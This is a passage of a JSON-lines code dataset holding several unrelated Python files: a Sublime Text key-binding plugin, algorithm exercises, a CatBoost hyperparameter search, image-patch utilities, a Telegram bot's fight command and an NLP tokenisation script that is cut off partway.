self.get_settings()\n self.settings['regular_run_mode'] = kwargs['regular_run_mode'] if 'regular_run_mode' in kwargs else False\n\n try:\n self.command_list = []\n self.run_commands = []\n self.favourites = []\n\n self.fav_command_list = []\n self.fav_run_commands = []\n\n # Get favourites from file.\n if self.settings['show_favourites']:\n self._add_favourites()\n\n # Keep track of contexts to avoid duplicates.\n self.added_contexts = []\n\n # Keep track of commands to avoid duplicates. User commands should always\n # overwrite default key bindings and user key bindings. User key bindings\n # should always overwrite default key bindings.\n self.added_user_commands = []\n self.added_commands = []\n \n # Add commands.\n if self.settings['show_user_commands']:\n self._add_user_commands()\n if self.settings['show_user_key_bindings']:\n self._add_user_key_bindings()\n if self.settings['show_default_key_bindings']:\n self._add_default_key_bindings()\n\n # Sort lists alphabetically. Both lists have to be sorted in order to keep them\n # synchronized with each other.\n if self.settings['sort_alphabetically']:\n self.command_list.sort(key = lambda list: list[0].lower())\n self.run_commands.sort(key = lambda list: list[0].lower())\n\n # Always sort favourites.\n self.fav_command_list.sort(key = lambda list: list[0].lower())\n self.fav_run_commands.sort(key = lambda list: list[0].lower())\n\n # Concatenate favourites and other commands to one list.\n self.command_list = self.fav_command_list + self.command_list\n self.run_commands = self.fav_run_commands + self.run_commands\n\n # @todo: Disabled for now.\n # if os.path.exists(self.default_path + '/show_update_splash'):\n # self.command_list = [['- QuickRef has been updated!', '- Select to remove this item and see what\\'s new.']] + self.command_list\n # self.run_commands = [['Show update']] + self.run_commands\n\n # Show quick panel with commands. Set a timeout to allow the panel to get ready before opening.\n sublime.set_timeout(lambda: self.window.show_quick_panel(self.command_list, self._on_select), 10)\n except Exception as e:\n sublime.status_message('QuickRef says: \"_run() is misbehaving. 
Here\\'s what happened: ' + str(e) + '\"')\n\n # Otherwise close the quick panel.\n else:\n self.window.run_command('hide_overlay')\n\n def _add_favourites(self):\n \"\"\"\n Add favourites from favourites file.\n \"\"\"\n favourites = os.path.join(self.paths['user_data'], 'favourites.txt')\n if os.path.exists(favourites):\n with open(favourites, 'r') as content:\n for command in content:\n self.favourites.append(command.rstrip())\n\n def _add_user_commands(self):\n \"\"\"\n Add commands specified in QuickRef user settings.\n \"\"\"\n # Parse commands from user settings file.\n user_commands = self.settings['commands']\n\n for command in user_commands:\n # Put keys on one line, separate with commas.\n keys = ', '.join(command['keys'])\n # Add items.\n self._prepare_command(command, keys)\n # Add command to list of added commands.\n self.added_user_commands.append(command['command'])\n\n def _add_user_key_bindings(self):\n \"\"\"\n Add user specified key bindings.\n \"\"\"\n # Load and parse commands from user keymap file.\n user_key_bindings_path = os.path.join(self.paths['user'], 'Default (' + self.platform + ').sublime-keymap')\n user_key_bindings = self.parse_json_file(user_key_bindings_path, True)\n\n for command in user_key_bindings:\n # Put keys on one line, separate with commas.\n keys = ', '.join(command['keys'])\n # Add items.\n self._prepare_command(command, keys)\n # Add command to list of added commands.\n self.added_user_commands.append(command['command'])\n\n def _add_default_key_bindings(self):\n \"\"\"\n Add default key bindings.\n \"\"\"\n # Load and parse commands from default keymap file.\n default_keymap = self.get_default_keymap()\n default_key_bindings = self.parse_json_file(default_keymap, True)\n\n for command in default_key_bindings:\n # Put keys on one line, separate with commas.\n keys = ', '.join(command['keys'])\n # Only add commands with specific shortcut keys. (Moved inside the loop:\n # the original checked `keys` before it was defined, raising a NameError.)\n if self.settings['key_filter']:\n if not any(x in keys for x in self.settings['key_filter']):\n continue\n # Add items.\n self._prepare_command(command, keys)\n # Add command to list of added commands.\n self.added_commands.append(command['command'])\n\n def _prepare_command(self, command, keys):\n \"\"\"\n Prepare commands for adding to command lists.\n \"\"\"\n # Check if command is a favourite.\n self.is_favourite = True if command['command'] + ',' + keys in self.favourites else False\n # Ignore duplicates of user added or user keymap commands.\n if command['command'] in self.added_user_commands:\n return\n\n # If there is a user added caption, display that in the list instead of the command.\n caption = command['caption'] if 'caption' in command else command['command']\n # Add context associated with the command (if any).\n context = command['context'] if 'context' in command else ''\n # Add arguments associated with the command (if any).\n args = command['args'] if 'args' in command else ''\n\n if context and self.settings['show_command_contexts']:\n for sub_context in context:\n # Ignore commands with duplicate contexts.\n if self.settings['remove_duplicate_contexts']:\n if command['command'] + sub_context['key'] in self.added_contexts:\n continue\n\n # Beautify commands and prepare them for output.\n caption = self._beautify_caption(command, sub_context)\n # Add command to command lists.\n self._add_command(caption, command, keys, args, context)\n # Add sub context key to list of contexts.\n self.added_contexts.append(command['command'] + sub_context['key'])\n else:\n # Ignore duplicates of 
default commands.\n if self.settings['remove_duplicates']:\n if command['command'] in self.added_commands:\n return\n\n # Beautify commands and prepare them for output.\n caption = self._beautify_caption(command, '')\n # Add command to command lists.\n self._add_command(caption, command, keys, args, context)\n\n def _add_command(self, caption, command, keys, args, context):\n \"\"\"\n Add command to command lists.\n \"\"\"\n # Add caption and keyboard shortcuts.\n list_item = [caption] + [keys]\n # Add caption, command, arguments and context for each context.\n command_item = [caption] + [command['command']] + [args] + [context]\n\n # Divide favourites from other commands. \n if self.is_favourite:\n self.fav_command_list.append(list_item)\n self.fav_run_commands.append(command_item)\n else:\n self.command_list.append(list_item)\n self.run_commands.append(command_item)\n\n def _beautify_caption(self, command, sub_context):\n \"\"\"\n Make captions prettier.\n \"\"\"\n if 'caption' in command:\n # Use supplied caption.\n caption = command['caption']\n elif self.settings['beautify_captions']:\n # Remove low dashes and capitalize first letter.\n caption = command['command'].replace('_', ' ').capitalize()\n else:\n # Keep command name as-is.\n caption = command['command']\n # If macro command, add macro name.\n if 'run_macro_file' == command['command']:\n caption += ' - ' + command['args']['file'].replace('Packages/Default/', '').replace('.sublime-macro', '')\n # Add context.\n if sub_context:\n caption += ' (' + sub_context['key'].replace('_', ' ').replace('setting.', '') + ')'\n # Add prefix to favourites only if showing favourites.\n if self.is_favourite and self.settings['show_favourites']:\n caption = '* ' + caption\n\n return caption\n\n def _on_select(self, idx):\n \"\"\"\n On list item selection.\n \"\"\"\n # If command list has items and one was selected (index equals zero or more).\n if self.command_list and idx > -1:\n # @todo: Disabled for now.\n # # Show latest updates in new window.\n # if 'Show update' == self.run_commands[idx][0]:\n # # Undefine command list in order to \"reset\" the plugin (see run()).\n # self.command_list = None\n # # Open file with latest changes from change log.\n # self.window.open_file(self.default_path + '/InThisVersion.txt', sublime.TRANSIENT)\n # # Remove splash control file to indicate that no splash should be shown.\n # os.remove(self.default_path + '/show_update_splash')\n\n # Add favourites to file.\n if not self.settings['regular_run_mode']:\n try:\n # Open a (new) favourites file.\n favourites = open(os.path.join(self.paths['user_data'], 'favourites.txt'), 'w')\n # Concatenate the complete command.\n command = self.run_commands[idx][1] + ',' + self.command_list[idx][1] \n # Add command if not in favourites list.\n if not command in self.favourites:\n favourites.write(command + '\\n')\n # Add all commands in favourites list except the selected one (will remove the command if already present).\n for saved_command in self.favourites:\n if saved_command != command:\n favourites.write(saved_command + '\\n')\n # Close file.\n favourites.close()\n\n # Undefine command list in order to \"reset\" the plugin (see run()).\n self.command_list = None\n # Run QuickRef again.\n self.run()\n except Exception as e:\n sublime.status_message('QuickRef says: \"_on_select() is misbehaving. 
Here\\'s what happened: ' + str(e) + '\"')\n\n # Do not run command if plugin is in hardcore mode (learn by not doing!).\n elif not self.settings['hardcore_mode']:\n # Run the command that corresponds with the selected item's caption.\n if not self.is_st2:\n # In ST3 it is necessary to explicitly call run_command() for TextCommand (ST2 can handle all types from ApplicationCommand).\n self.window.active_view().run_command(self.run_commands[idx][1], self.run_commands[idx][2])\n # Run command.\n self.window.run_command(self.run_commands[idx][1], self.run_commands[idx][2])\n # Undefine command list in order to \"reset\" the plugin (see run()).\n self.command_list = None\n else:\n # Undefine command list in order to \"reset\" the plugin (see run()).\n self.command_list = None\n\n def parse_json_file(self, file, clean_json = False):\n \"\"\"\n Parses a JSON file and removes invalid patterns.\n \"\"\"\n try:\n if clean_json:\n # Regular expression for comments.\n comment_re = re.compile(\n '(^)?[^\\S\\n]*/(?:\\*(.*?)\\*/[^\\S\\n]*|/[^\\n]*)($)?',\n re.DOTALL | re.MULTILINE\n )\n\n with open(file, 'r') as f:\n content = ''.join(f.readlines())\n # Remove illegal commas (,) from last item in JSON arrays.\n content = re.sub(r',\\n\\s+]', '\\n]', content)\n # @todo: Fix.\n # Colons (:) make json module raise an exception, so the whole problematic part is removed.\n # Unfortunately this will also render all macros unable to run from QuickRef.\n content = re.sub(r'res://', '', content)\n # Look for comments.\n match = comment_re.search(content)\n while match:\n content = content[:match.start()] + content[match.end():]\n match = comment_re.search(content)\n\n json_object = json.loads(content)\n\n else:\n with open(file, 'r') as f:\n content = ''.join(f.readlines())\n json_object = json.loads(content)\n\n return json_object\n\n except (ValueError, Exception) as e:\n sublime.status_message('QuickRef says: \"We have a JSON error. Here\\'s what happened: ' + str(e) + '\"')
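\n\n # Illustrative (hypothetical) example of parse_json_file() with clean_json=True:\n # content such as '[\\n { \"keys\": [\"ctrl+q\"] }, // note\\n ]' first loses the '//'\n # comment via comment_re, then the now-trailing comma via re.sub(), leaving\n # plain JSON for json.loads().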
\n\n def get_paths(self):\n \"\"\"\n Fetches important paths.\n \"\"\"\n sublime_packages_path = sublime.packages_path()\n paths = {\n 'user': os.path.join(sublime_packages_path, 'User'),\n 'user_data': os.path.join(sublime_packages_path, 'User', 'QuickRefData')\n }\n\n return paths\n\n def get_settings(self):\n \"\"\"\n Fetches settings.\n \"\"\"\n # Get paths.\n paths = self.get_paths()\n # Make sure there is a data directory.\n if not os.path.isdir(paths['user_data']):\n os.makedirs(paths['user_data'])\n\n # Load settings file.\n settings_object = sublime.load_settings('QuickRef.sublime-settings')\n\n # Get settings and commands.\n settings = settings_object.get('settings')\n settings['commands'] = settings_object.get('commands')\n\n return settings\n\n def get_default_keymap(self):\n \"\"\"\n Fetches default key bindings.\n \"\"\"\n # Get paths.\n paths = self.get_paths()\n # Prepare settings filename.\n keymap_file = 'Default (' + self.platform + ').sublime-keymap'\n # Set data directory path.\n user_data_keymap = os.path.join(paths['user_data'], keymap_file)\n\n if self.is_st2:\n return os.path.join(sublime.packages_path(), 'Default', keymap_file)\n else:\n default_package = os.path.dirname(Default.__file__)\n \n # Check if there is a default keymap.\n if not os.path.exists(user_data_keymap):\n # Extract and copy the default keymap to data directory.\n with zipfile.ZipFile(default_package, 'r') as zip:\n zip.extract(keymap_file, paths['user_data'])\n\n # Check if the default keymap in the data directory is outdated.\n if os.path.getmtime(default_package) > os.path.getmtime(user_data_keymap):\n # Extract and copy the default keymap to data directory.\n with zipfile.ZipFile(default_package, 'r') as zip:\n zip.extract(keymap_file, paths['user_data'])\n\n return user_data_keymap","repo_name":"terrierscript/sublime-settings","sub_path":"settings/Packages/QuickRef/QuickRef.py","file_name":"QuickRef.py","file_ext":"py","file_size_in_byte":15028,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"11190294213","text":"# Print the subsets whose sum is 10\n\nN = 10\narr = list(range(1,N+1))\nselected = [0]*(N)\ncnt = 0\n# each index element marks whether it is in the subset\ndef powerset(selected, idx, sum_value): # sum_value is for backtracking (pruning)\n global cnt\n if sum_value > 10:\n return\n\n if idx == N:\n sum_cur = 0\n sub_set = []\n for i in range(len(selected)):\n if selected[i] == 1:\n sum_cur += arr[i]\n sub_set.append(arr[i])\n cnt += 1\n\n if sum_cur == 10:\n print(sub_set)\n # print(arr[i], end=' ')\n # print()\n # print(selected)\n return\n\n selected[idx] = 1\n powerset(selected,idx+1,sum_value+ arr[idx])\n selected[idx] = 0\n powerset(selected,idx+1,sum_value)\n\npowerset(selected,0,0)\nprint(cnt)\n\n\n\n# implementation without selected\ndef powerset2(idx, sum_value,sub_set):\n if sum_value > 10:\n return\n\n if idx == N :\n print(sub_set)\n # if sum_value==10:\n # print(sub_set)\n return\n sub_set.append(arr[idx])\n powerset2(idx+1, sum_value+arr[idx], sub_set)\n sub_set.pop()\n powerset2(idx +1, sum_value , sub_set)\n\npowerset2(0,0,[])","repo_name":"jisy2718/_algorithm","sub_path":"정리할것들/0330_분할정복_백트래킹/subset_sum.py","file_name":"subset_sum.py","file_ext":"py","file_size_in_byte":1200,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"74605897512","text":"class MyClass :\r\n\r\n user_name = \"\" # declare an instance variable\r\n age = \"\" # declare an instance variable\r\n def say ( self ) :\r\n print ( \"名前:{0},年齢:{1}\" . 
format ( self.user_name , self.age ) ) # the format arguments could be user1.user_name, but since user2 must be shown too, we use self (the parameter) where the instance variables are defined\r\n\r\n# first instance\r\nuser1 = MyClass ( ) # instantiation; to call a class method, call it from the variable that stores the instantiated class.\r\nuser1 . user_name = \" 山田 \" # attribute (a variable inside the class); assigns the name\r\nuser1.age = 20\r\n\r\n# second instance\r\nuser2 = MyClass ( )\r\nuser2.user_name = \" 鈴木 \" # attribute\r\nuser2 . age = 40\r\nuser1 . say ( ) # here user1 executes the body of the \"say\" method\r\nuser2 . say ( ) # same as above","repo_name":"YamatoKato/bacics","sub_path":"basics/MyPython/classtest1.py","file_name":"classtest1.py","file_ext":"py","file_size_in_byte":1012,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"17960575167","text":"# first load ds\n# then split again for validation\n# then construct catboost ensemble\n# then fit\n# output predictions on test set\n\nfrom methods import CatboostMethod\nimport numpy as np\nimport sklearn.model_selection\nimport torch\nfrom metric import amex_metric_np\nimport optuna\nfrom optuna.integration import CatBoostPruningCallback\nimport argparse\n\ndef objective(trial):\n learning_rate = trial.suggest_float(\"learning_rate\", 1e-3, 1e-1, log=True)\n depth = trial.suggest_int(\"depth\", 3, 11)\n l2_leaf_reg = trial.suggest_int(\"l2_leaf_reg\", 3, 30)\n #use_class_weights = trial.suggest_int(\"use_class_weights\", 0, 1)\n class_weights = [\n np.count_nonzero(train_y == 0) / len(train_y),\n np.count_nonzero(train_y == 1) / len(train_y),\n ]\n print(f'Determined class weights {class_weights}')\n catboost_options = {\n \"iterations\": 400,\n \"l2_leaf_reg\": l2_leaf_reg,\n \"depth\": depth,\n \"learning_rate\": learning_rate,\n \"verbose\": True,\n \"task_type\": \"GPU\" if torch.cuda.is_available() else None,\n \"eval_metric\": \"Accuracy\",\n #\"class_weights\": class_weights if use_class_weights == 1 else None,\n \"auto_class_weights\": \"Balanced\",\n \"random_seed\": 42, # Make more reproducible\n \"use_best_model\": True,\n \"od_type\": \"Iter\",\n \"od_wait\": 50,\n }\n catboost_fit_options = {\n \"callbacks\": [CatBoostPruningCallback(trial, \"Accuracy\")],\n }\n\n method = CatboostMethod(config=catboost_options)\n method.train(X_train_floats, X_val_floats, X_train_cat, X_val_cat, y_train, y_val, fit_kwargs=catboost_fit_options)\n\n preds = method.eval(X_val_floats, X_val_cat)\n metric = amex_metric_np(y_val, preds)\n return metric\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument('--data', required=True)\n\n args = parser.parse_args()\n\n data = np.load(args.data)\n train_floats = data['train_floats']\n train_cat = data['train_cat']\n train_y = data['train_y']\n test_floats = data['test_floats']\n test_cat = data['test_cat']\n test_y = data['test_y']\n\n X_train_floats, X_val_floats, X_train_cat, X_val_cat, y_train, y_val = sklearn.model_selection.train_test_split(\n train_floats, train_cat, train_y\n )\n\n study = optuna.create_study(direction=\"maximize\", storage='sqlite:///optuna.db', load_if_exists=True, study_name=\"amex_predict\")\n study.optimize(objective, n_trials=3)\n best_params = study.best_params\n print(best_params)","repo_name":"J-Gann/CreditDefaultPrediction","sub_path":"explore_train_catboost.py","file_name":"explore_train_catboost.py","file_ext":"py","file_size_in_byte":2520,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"4978132046","text":"#!/usr/bin/env python\n# file utils.py\n# author Florent Guiotte 
\n# version 0.0\n# date 18 March 2020\n\"\"\"\nUtils\n=====\n\nVarious utilities unrelated to trees or profiles.\n\n\"\"\"\n\nimport numpy as np\n\ndef ndarray_hash(x, l=8, c=1000):\n \"\"\"\n Compute a hash from a numpy array.\n\n Parameters\n ----------\n x : ndarray\n The array to hash.\n l : int, optional\n The length of the hash. Must be an even number.\n c : int, optional\n A variable to affect the sampling of the hash. It has to be the\n same along the matching process. Refer to notes.\n\n Returns\n -------\n hash : str\n The hash of array x.\n\n Notes\n -----\n Python hash is slow and will offset the random generator in each\n kernel. The hash of the same data will not match in different\n kernels.\n\n The idea is to sparsely sample the data to speed up the hash\n computation. By fixing the number of samples the hash computation\n will take a fixed amount of time, no matter the size of the data.\n\n This hash function outputs a hash of :math:`x` in hexadecimal. The\n length of the hash is :math:`l`. The hashes are consistent when\n tuning the length :math:`l`: shorter hashes are contained in the\n longer ones for the same data :math:`x`. The number of samples taken in\n :math:`x` is :math:`\\\\frac{l \\\\times c}{2}`.\n\n \"\"\"\n rs = np.random.RandomState(42)\n x = np.require(x, requirements='C')\n bt = np.frombuffer(x, np.uint8)\n ss = rs.choice(bt, int(l / 2) * c).reshape(-1, c).sum(1, np.uint8)\n return ''.join(['{:02x}'.format(x) for x in ss])\n\ndef local_patch(arr, patch_size=7):\n \"\"\"\n Create local patches around each value of the array\n\n Parameters\n ----------\n arr : ndarray\n The input data.\n patch_size : int\n The size :math:`w` of the patches. For a 2D ndarray the\n returned patch size will be :math:`w \\\\times w`.\n\n Returns\n -------\n patches : ndarray\n The local patches. The shape of the returned array is\n ``arr.shape + (patch_size,) * arr.ndim``.\n\n Notes\n -----\n This implementation is memory efficient. The returned patches are a\n view of the original array and are not writeable.\n\n This function works regardless of the dimension of ``arr`` with\n hypercube-shaped patches, according to the dimension of ``arr``.\n\n See Also\n --------\n local_patch_f : use a function over the local patches.\n\n \"\"\"\n a = np.pad(arr, int(patch_size / 2), 'reflect')\n shape = tuple(np.array(a.shape) - patch_size + 1) + (patch_size,) * a.ndim\n strides = a.strides * 2\n return np.lib.stride_tricks.as_strided(a, shape=shape, strides=strides, writeable=False)\n\ndef local_patch_f(arr, patch_size=7, f=np.mean):\n \"\"\"local_patch_f(arr, patch_size=7, f=np.mean)\n Describe local patches around each value of the array\n\n Parameters\n ----------\n arr : ndarray\n The input data.\n patch_size : int\n The size :math:`w` of the patches.\n f : function\n The function to run over the local patches. For now it is\n necessary to use a function with ``axis`` parameter such as\n ``np.mean``, ``np.std``, etc... See more functions on `Numpy\n documentation\n `_.\n\n Returns\n -------\n patches : ndarray\n The description of the local patches. The shape of the returned\n array is ``arr.shape``.\n\n Notes\n -----\n Refer to :func:`local_patch` for full documentation.\n\n See Also\n --------\n local_patch : create the local patches.\n\n \"\"\"\n n = local_patch(arr, patch_size)\n return f(n, axis=tuple(~(np.arange(arr.ndim))))\n
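\n\n# Illustrative quick check of the two helpers above (hypothetical values, shapes only):\n# >>> x = np.arange(16).reshape(4, 4)\n# >>> local_patch(x, patch_size=3).shape\n# (4, 4, 3, 3)\n# >>> local_patch_f(x, patch_size=3, f=np.mean).shape\n# (4, 4)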
The shape of the returned\n    array is ``arr.shape``.\n\n    Notes\n    -----\n    Refer to :func:`local_patch` for full documentation.\n\n    See Also\n    --------\n    local_patch : create the local patches.\n\n    \"\"\"\n    n = local_patch(arr, patch_size)\n    return f(n, axis=tuple(~(np.arange(arr.ndim))))\n","repo_name":"fguiotte/sap","sub_path":"sap/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":3740,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"72"} +{"seq_id":"32158960064","text":"from collections import defaultdict as dd\r\nimport sys\r\ninput = sys.stdin.readline\r\nW, S = map(int, input().split())\r\nw = input().strip()\r\ns = input().strip()\r\nanswer = 0\r\n# for each character in w, set a key and increase its value by the character count\r\n# slice s in windows the length of w; whenever every key matches, increase the number of cases\r\nw_arr = [0] * 58\r\ns_arr = [0] * 58\r\nidx = 0\r\nfor i in w:\r\n    w_arr[ord(i) - 65] += 1\r\nstart = s[0]\r\nfor i in s[:W]:\r\n    s_arr[ord(i)-65] += 1\r\nif w_arr == s_arr:\r\n    answer += 1\r\nfor i in range(W, S):\r\n    s_arr[ord(s[i])-65] += 1\r\n    s_arr[ord(s[i-W])-65] -= 1\r\n    if w_arr == s_arr:\r\n        answer += 1\r\nprint(answer)","repo_name":"wnsgml7267/cote-practice","sub_path":"백준/Gold/1593. 문자 해독/문자 해독.py","file_name":"문자 해독.py","file_ext":"py","file_size_in_byte":633,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"22532816408","text":"from collections import Counter\nfrom functools import reduce\nn = int(input())\n\ncounter = Counter(list(map(int, input().split())))\n# print(counter)\nq = int(input())\nresult = 0\nfor i in range(q):\n    b, c = map(int, input().split())\n    counter[c] += counter[b]\n    result += (c - b) * counter[b]\n    counter[b] = 0\n    if i == 0:\n        result = sum([a * b for a, b in zip(counter.keys(), counter.values())])\n    print(result)","repo_name":"melank/atCoder","sub_path":"abc171/d/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":426,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"1626569494","text":"from mongoengine import *\nfrom controle_de_usuarios import Usuarios\nimport os\n\n# password used to check whether adding is allowed\nsenha_admin = os.environ.get('SENHAADMINTELEGRAM', None)\n\n\t\nclass TextoBriga(Document):\n\tacao = StringField(required=True, max_length=300)\n\tquantUsuarios = IntField(required=True, max_length=20)\n\t\n# function responsible for generating the fight\ndef briga(update, context):\n\tentidadesMensagem = update.message.parse_entities(types='mention')\n\t\n\t\n\t# take the mentions and turn them into names\n\tmembrosDaBriga = []\n\tfor nomes in entidadesMensagem.values():\n\t\tmembrosDaBriga.append(nomes)\n\n\t# check the number of mentions to decide what to do\n\tquantidadeNaBriga = len(membrosDaBriga)\n\t# if the count is 0, nobody was mentioned, so the person hits themselves; pick a text that mentions nobody or has a single mention in the middle\n\tif(quantidadeNaBriga==0):\n\t\tbrigaAtual = list(TextoBriga.objects.filter(quantUsuarios__lte=1).aggregate( [ { \"$sample\": { 'size': 1 } } ]))\n\t\tif(not brigaAtual == []):\n\t\t\tbrigaAtual = brigaAtual[0]\n\t\t\ttextosBrigas = brigaAtual['acao'].split(\"\\X\")\n\t\t\tif(len(textosBrigas)==2):\n\t\t\t\tupdate.message.reply_text(textosBrigas[0]+\"@\"+update.message.from_user.username+textosBrigas[1])\n\t\t\telse:\n\t\t\t\tupdate.message.reply_text(brigaAtual['acao'])\n\t\telse:\n\t\t\tupdate.message.reply_text(\"Você bateu em si mesmo, bom trabalho\")\n\t\n\t# only one person was mentioned, 
so another one has to be chosen at random\n\telif(quantidadeNaBriga==1):\n\t\tbrigaAtual = list(TextoBriga.objects.filter(quantUsuarios=2).aggregate( [ { \"$sample\": { 'size': 1 } } ]))\n\t\tusuarioAleatorio = Usuarios.objects.filter(username=update.message.from_user.username).aggregate( [ { \"$sample\": { 'size': 1 } } ])\n\t\tif(not brigaAtual == []):\n\t\t\tbrigaAtual = brigaAtual[0]\n\t\t\ttextosBrigas = brigaAtual['acao'].split(\"\\X\")\n\t\t\tfor userAt in usuarioAleatorio:\n\t\t\t\tupdate.message.reply_text(textosBrigas[0]+membrosDaBriga[0]+textosBrigas[1]+\"@\"+str(userAt['username'])+textosBrigas[2])\n\t\telse:\n\t\t\tupdate.message.reply_text(\"Aqui vai ser feito um aleatório com outras pessoas, ainda não está pronto\")\n\t\t\t\n\t# two people are mentioned here, so pick both and show the message\n\telif(quantidadeNaBriga==2):\n\t\tbrigaAtual = list(TextoBriga.objects.filter(quantUsuarios=2).aggregate( [ { \"$sample\": { 'size': 1 } } ]))\n\t\tprint(brigaAtual)\n\t\tif(not brigaAtual == []):\n\t\t\tbrigaAtual = brigaAtual[0]\n\t\t\ttextosBrigas = brigaAtual['acao'].split(\"\\X\")\n\t\t\tupdate.message.reply_text(textosBrigas[0]+membrosDaBriga[0]+textosBrigas[1]+membrosDaBriga[1]+textosBrigas[2])\n\t\telse:\n\t\t\tupdate.message.reply_text(membrosDaBriga[0]+\" bateu em \"+membrosDaBriga[1])\n\t\t\t\n\t# three or more people means a group fight; pick the appropriate message and use a for loop to build it\n\telif(quantidadeNaBriga>2):\n\t\tbrigaAtual = list(TextoBriga.objects.filter(quantUsuarios=quantidadeNaBriga).aggregate( [ { \"$sample\": { 'size': 1 } } ]))\n\t\tif(not brigaAtual == []):\n\t\t\tbrigaAtual = brigaAtual[0]\n\t\t\ttextosBrigas = brigaAtual['acao'].split(\"\\X\")\n\t\t\ti=0\n\t\t\ttextoFinal=\"\"\n\t\t\tfor texto in textosBrigas:\n\t\t\t\ttextoFinal+=texto+membrosDaBriga[i]\n\t\t\t\ti+=1\n\t\t\tupdate.message.reply_text(textoFinal)\n\t\telse:\n\t\t\tupdate.message.reply_text(\"Aqui vai ser porradaria em grupo, ainda não está pronto\")\n\t\t\n\t\t\n# function responsible for adding a new fight\ndef adiciona_briga(update, context):\n\ttextoAtual = update.message.text\n\ttextoAtual = textoAtual.split(\" \", 1)\n\tif(len(textoAtual)>1):\n\t\ttextoAtual = textoAtual[1].split(\"@\")\n\t\tsenha = textoAtual[0]\n\t\tif(senha_admin==senha):\n\t\t\ttextoDividido = textoAtual[1].split(\"\\X\")\n\t\t\ttamTextoDividido = len(textoDividido)\n\t\t\tif(tamTextoDividido>0):\n\t\t\t\tbrigaDB = TextoBriga(acao = textoAtual[1])\n\t\t\t\tbrigaDB.quantUsuarios = tamTextoDividido-1\n\t\t\t\tbrigaDB.save()\n\t\t\t\tupdate.message.reply_text(\"Comando salvo\")\n\t\t\telse:\n\t\t\t\tupdate.message.reply_text(\"Mensagem inválida\")\n\t\telse:\n\t\t\tupdate.message.reply_text(\"Senha incorreta\")\n\telse:\n\t\tupdate.message.reply_text(\"Mensagem inválida\")","repo_name":"felipe-b-vieira/littlelightbottelegram","sub_path":"comandos_bot/briga.py","file_name":"briga.py","file_ext":"py","file_size_in_byte":3986,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"34809513909","text":"from tkinter import *\nfrom Database import funciones\nfrom tkinter.messagebox import showinfo, showwarning, showerror\n\ndef eliminarEstudiante():\n    y2 = Frame()\n    y2.place(x=0, y=0, width=500, height=1000)\n    y2.config(background = \"#213141\")\n    y3 = Label(y2, text=\"ELIMINAR USUARIO\",bg='black', fg='white', width=25,font=(\"bold\", 22))\n    y3.place(x=40, y=60)\n\n    # Creating FullName\n    b = Label(y2, text=\"ID ESTUDIANTE:\", width=20, 
font=(\"bold\", 12))\n b.place(x=75, y=130)\n # Creating Entry For FullName\n b1 = Entry(y2)\n b1.place(x=300, y=130)\n\n def callback():\n try:\n res = funciones.deleteEstudiante(b1.get())\n if(res[\"status\"]==1):\n showinfo(\"Arquitectura empresarial\", res[\"message\"])\n y2.destroy()\n except Exception as ex:\n showinfo(\"Arquitectura empresarial\", \"Ocurrio un error al elimiar el estudiante\")\n\n Button(y2, text='SUBMIT', width=20, bg=\"#04d616\", fg='white', command=callback).place(x=180, y=180)\n\n\n Button(y2, text='RETURN', width=20, bg=\"#cd5656\", fg='white', command=lambda:[y2.destroy()]).place(x=180, y=230)\n","repo_name":"dgonzalezt2/MSSQL_with_PythonGUI","sub_path":"GUI/views/student/eliminar.py","file_name":"eliminar.py","file_ext":"py","file_size_in_byte":1133,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"5469073192","text":"\"\"\"\npython test_cc.py \n --model_path models/T6t.mdl \n --test_file inputs/cc/commoncrawl.json\n --log_path inputs/cc/T6t\n\"\"\"\n\nimport os\nimport json\nimport time\nfrom argparse import ArgumentParser\n\nimport torch\nimport nltk\nfrom nltk.tokenize import sent_tokenize, word_tokenize\nfrom nltk.tokenize.treebank import TreebankWordDetokenizer as Detok\nfrom tqdm import tqdm\n\nfrom src.data import IEDatasetEval, InstanceLdcEval, BatchLdcEval\nfrom predict import load_model\n\nnltk.download('punkt')\n\ndef text_to_tokens(text, sent_id, offset):\n \"\"\"\n this tokenizes the text into words according to NLTK's model\n The important output is doc, which contains:\n (1) doc id\n (2) tokens\n \"\"\"\n doc_tokens = []\n tokens = word_tokenize(text)\n tokens = [(token, offset + i, offset + i + 1)\n for i, token in enumerate(tokens)]\n doc_tokens.append((sent_id, tokens))\n return doc_tokens, tokens\n\n\ndef numberize(data, tokenizer, sent_max_length, sent_id):\n numberized_data = []\n for i, (sent_id, sent_tokens) in enumerate(data):\n tokens = []\n token_ids = []\n pieces = []\n token_lens = []\n truncate=False\n for token_text, start_char, end_char in sent_tokens:\n token_id = '{}:{}-{}'.format(sent_id, start_char, end_char)\n token_pieces = [p for p in tokenizer.tokenize(token_text) if p]\n if len(token_pieces) == 0:\n print(\"uncommon symbol encountered\")\n print(sent_tokens)\n print()\n token_pieces = [p for p in tokenizer.tokenize('N') if p]\n # continue\n tokens.append(token_text)\n token_ids.append(token_id)\n # handle overlength sentences, by truncation\n if (len(token_pieces) + len(pieces))>(sent_max_length - 2):\n truncate=True\n if truncate:\n continue\n pieces.extend(token_pieces)\n token_lens.append(len(token_pieces))\n \n # # skip overlength sentences\n # if len(pieces) > sent_max_length - 2:\n # continue\n # skip empty sentences\n if len(pieces) == 0:\n continue\n\n # pad word pieces with special tokens\n piece_idxs = tokenizer.encode(pieces,\n add_special_tokens=True,\n max_length=sent_max_length,\n truncation=True\n )\n pad_num = sent_max_length - len(piece_idxs)\n attn_mask = [1] * len(piece_idxs) + [0] * pad_num\n piece_idxs = piece_idxs + [0] * pad_num\n\n instance = InstanceLdcEval(\n sent_id=sent_id,\n tokens=tokens,\n 